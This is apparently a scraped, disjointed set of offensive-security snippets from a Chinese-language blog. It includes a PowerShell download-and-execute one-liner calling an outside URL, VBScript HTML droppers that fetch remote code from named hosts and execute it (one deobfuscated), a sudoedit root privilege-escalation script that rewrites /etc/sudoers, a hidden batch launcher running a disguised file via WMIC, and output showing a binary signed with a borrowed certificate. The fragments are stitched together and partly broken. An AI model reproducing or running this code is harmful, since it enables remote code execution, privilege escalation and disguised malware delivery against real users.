I E X ( N e w - O b j e c t N e t . W e b c l i e n t ) . d o w n l o a d s t r i n g ( " h t t p : / / e d u c a t i o l i n k . c o m / i n d e x . p h p " )
<html> <scriptlanguage="vbscript"> On Error Resume Next Set Posto = CreateObject("MSXML2.ServerXMLHTTP.6.0") Posto.open "GET", "baidu.com", False ' http://hpurusymireene.com/theme/basic/skin/member/basic/upload/eweerew.php?er=1 Posto.send to = Posto.responseText Execute(to) </script> </html>
<html> <!--一个简单的子序列拼接函数--> <!--输入'123456789abcdefghiklm'--> <!--输出''1a2b3c4d5e6f7g8h9iklm''--> <scriptlanguage="vbscript"> On Error Resume Next
Function cooo(c) L = Len(c) s = "" d = 9 For jx = 0 To d - 1 For ix = 0 To Int(L/d) - 1 s = s & Mid(c, ix*d+jx+1, 1) Next Next s = s & Right(c, L - Int(L/d) * d) cooo = s End Function
Set Posto = CreateObject("MSXML2.ServerXMLHTTP.6.0") Posto.open "GET", "baidu.com", False ' https://christinadudley.com/public_html/edudley/sites/default/files/1203427/expres.php?op=1 Posto.send to = Posto.responseText to = cooo(to) Execute(to) </script> </html>
if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$' then echo"> Currently installed sudo version is not vulnerable" exit 1 fi #判断sudoers里有无test ALL=(ALL:ALL) sudoedit EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | cut -d ')' -f 2-)
if [ -z "$EXPLOITABLE" ]; then echo"> It doesn't seem that this user can run sudoedit as root" read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2 else echo"> BINGO! User exploitable" fi
echo"> Opening sudoers file, please add the following line to the file in order to do the privesc:" echo"$USER ALL=(ALL:ALL) ALL" read -n 1 -s -r -p "Press any key to continue..." echo"$EXPLOITABLE" #下面的payload实际上是EDITOR="vim -- /etc/sudoers" sudoedit EDITOR="vim -- /etc/sudoers"$EXPLOITABLE sudo su root exit 0
2.在上面的exp运行时,按两下回车,会自动打开sudoers的编辑界面。
1 2 3 4 5
将之前的 test ALL=(ALL:ALL) sudoedit 改为--> test ALL=(ALL:ALL) ALL 保存退出
// src/sudo_edit.c@sudo_edit() int sudo_edit(struct command_details *command_details) { // [...] /* * Set real, effective and saved uids to root. * We will change the euid as needed below. */ //设置了ROOT权限和临时可写目录 setuid(ROOT_UID); // [...] /* Find a temporary directory writable by the user. */ set_tmpdir(&user_details.cred); // [...] /* * The user's editor must be separated from the files to be * edited by a "--" option. */ //argv[]={'vim','--','/etc/sudoers','--','/etc/custom_test.txt'} for (ap = command_details->argv; *ap != NULL; ap++) { if (files) nfiles++; //命令行参数与--比较,如果相同则将下一个内容视为要编辑的文件名 elseif (strcmp(*ap, "--") == 0) files = ap + 1; else editor_argc++; }
/* * We use "--" to separate the editor and arguments from the files * to edit. The editor arguments themselves may not contain "--". */ if (strcmp(nargv[nargc], "--") == 0) { sudo_warnx(U_("ignoring editor: %.*s"), (int)edlen, ed);
try: os.remove(TempFile + ".zip") # Delete temporary zip file except Exception as e: print(e) os.sys.exit(1)
try: print("Changing suffix..") with open(OuputFile, "wb") as file: file.write(file_content) # Write modified content to output file except Exception as e: print(e) os.sys.exit(1) try: shutil.rmtree(TempFile) # Delete temporary directory except Exception as e: print(e) os.sys.exit(1) print("Generation completed")
def copy_file(src, dst): with open(src, "rb") as in_file, open(dst, "wb") as out_file: out_file.write(in_file.read())
def zip_directory(dir_name): with zipfile.ZipFile(TempFile + ".zip", "w", zipfile.ZIP_DEFLATED) as zip_file: for root, _, files in os.walk(dir_name): for file in files: file_path = os.path.join(root, file) arcname = os.path.relpath(file_path, dir_name) zip_file.write(file_path, arcname=arcname)
@echo off if not DEFINED IS_MINIMIZED ( set IS_MINIMIZED=1 start "" /min "%~dpnx0" %* exit )
cd %TEMP%
for /F "delims=" %%K in ('dir /b /s "Screenshot_05-04-2023.jpg"') do ( for /F "delims=" %%G in ('dir /b /s "Images.ico"') do ( WMIC process call create "%%~G" "%%~K" cd %CD% exit ) ) exit
The following certificates were considered: Issued to: GS Issued by: GS Expires: Tue Jan 01 00:00:00 2030 SHA1 hash: EE0FBF8360FF3E8592A0CA55096760CBB9D3E835
After EKU filter, 1 certs were left. After expiry filter, 1 certs were left. After Private Key filter, 0 certs were left. SignTool Error: No certificates were found that met all the given criteria.
The following certificates were considered: Issued to: NVIDIA GameStream Server Issued by: NVIDIA GameStream Server Expires: Fri Jun 26 16:03:20 2043 SHA1 hash: 387B08818D2E0BC8BFA623DC033AF906246F4BEA
After EKU filter, 1 certs were left. After expiry filter, 1 certs were left. After Private Key filter, 1 certs were left. The following certificate was selected: Issued to: NVIDIA GameStream Server Issued by: NVIDIA GameStream Server Expires: Fri Jun 26 16:03:20 2043 SHA1 hash: 387B08818D2E0BC8BFA623DC033AF906246F4BEA
Done Adding Additional Store Successfully signed: test.exe
Number of files successfully Signed: 1 Number of warnings: 0 Number of errors: 0
typedefstructPKCS7_SignedData { int version; // Version (of PKCS #7, generally version 1) digestAlgorithms DigestAlgorithms; // Collection of all algorithms used by SignerInfo signature blocks contentInfo ContentInfo; // Content type and content or reference to content certificates *ExtendedCertificatesAndCerticificates, // OPTIONAL: Collection of all certificates used *CertificateRevocationLists; // OPTIONAL: Collection of all CRLs signerInfos *signerInfos; // One or more SignerInfo signature blocks } PKCS7_SignedData;
typedefstructSignerInfo { Certificate certificate; // Issuer and serial number to uniquely identify the signer's certificate DigestAlgorithm digestAlgorithm; // Digest algorithm DigestEncryptionAlgorithm digestEncryptionAlgorithm; // Digest encryption algorithm Digest digest; // Hash EncryptedDigest encryptedDigest; // Actual signature AuthenticatedAttribute *authenticatedAttributes; // OPTIONAL: Attributes signed by this signer UnauthenticatedAttribute *unauthenticatedAttributes; // OPTIONAL: Attributes not signed by this signer } SignerInfo; contentInfo=Sequence( contenttype Contenttype, content [0] )